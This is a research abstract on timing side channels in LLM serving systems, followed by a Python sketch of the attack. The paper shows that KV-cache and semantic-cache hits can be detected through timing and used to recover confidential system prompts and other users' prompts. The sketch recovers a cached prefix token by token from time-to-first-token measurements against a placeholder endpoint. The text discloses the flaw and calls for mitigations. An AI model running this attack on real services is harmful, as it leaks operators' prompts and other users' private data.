The wide deployment of Large Language Models (LLMs) has given rise to a strong demand for optimizing their inference performance. Today's techniques serving this purpose primarily focus on reducing latency and improving throughput through algorithmic and hardware enhancements, while largely overlooking their privacy side effects, particularly in multi-user environments. In our research, for the first time, we discovered a set of new timing side channels in LLM systems, arising from shared caches and GPU memory allocations, which can be exploited to infer both confidential system prompts and prompts issued by other users. These vulnerabilities echo security challenges observed in traditional computing systems, highlighting an urgent need to address potential information leakage in LLM serving infrastructures. In this paper, we report novel attack strategies designed to exploit such timing side channels inherent in LLM deployments, specifically targeting the Key-Value (KV) cache and the semantic cache widely used to enhance LLM inference performance. Our approach leverages timing measurements and classification models to detect cache hits, allowing an adversary to infer private prompts with high accuracy. We also propose a token-by-token search algorithm to efficiently recover shared prompt prefixes in the caches, showing the feasibility of stealing system prompts and prompts issued by peer users. Our experimental studies, based on black-box testing of popular online LLM services, demonstrate that such privacy risks are entirely realistic and carry significant consequences. Our findings underscore the need for robust mitigations to protect LLM systems against these emerging threats.
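To make the attack surface concrete, the sketch below illustrates one plausible instantiation of the timing-based, token-by-token prefix recovery summarized above. It is a minimal sketch, not the paper's exact algorithm: the API endpoint, the streaming request format, the `measure_ttft` helper, the candidate vocabulary, and the fixed hit/miss threshold are all assumptions introduced for illustration. The underlying observation is that a KV-cache hit on a shared prompt prefix skips part of the prefill computation, so a correctly guessed next token yields a measurably lower time-to-first-token (TTFT) than incorrect guesses.

```python
import time
import statistics
import requests  # assumed HTTP client; the endpoint below is a placeholder

API_URL = "https://llm.example.com/v1/completions"  # hypothetical serving endpoint


def measure_ttft(prompt: str, n_trials: int = 5) -> float:
    """Median time-to-first-token (TTFT) for a prompt.

    A KV-cache hit on a shared prompt prefix skips part of the prefill
    computation, so cached prefixes show a measurably lower TTFT.
    """
    timings = []
    for _ in range(n_trials):
        start = time.perf_counter()
        with requests.post(
            API_URL,
            json={"prompt": prompt, "max_tokens": 1, "stream": True},
            stream=True,
            timeout=30,
        ) as resp:
            next(resp.iter_lines())  # stop the clock at the first streamed token
        timings.append(time.perf_counter() - start)
    return statistics.median(timings)


def recover_prefix(vocab: list[str], max_tokens: int, hit_threshold: float) -> str:
    """Token-by-token search: greedily extend the recovered prefix with the
    candidate token whose TTFT indicates a cache hit (below hit_threshold)."""
    recovered = ""
    for _ in range(max_tokens):
        best_tok, best_ttft = None, float("inf")
        for tok in vocab:
            ttft = measure_ttft(recovered + tok)
            if ttft < best_ttft:
                best_tok, best_ttft = tok, ttft
        if best_tok is None or best_ttft > hit_threshold:
            break  # no candidate looks cached; the recoverable prefix ends here
        recovered += best_tok
    return recovered
```

In practice, the hit/miss decision would be made by a classifier trained over repeated timing measurements rather than a fixed threshold, consistent with the classification models mentioned above, and the candidate set would be pruned with a language model rather than exhaustively enumerating a vocabulary.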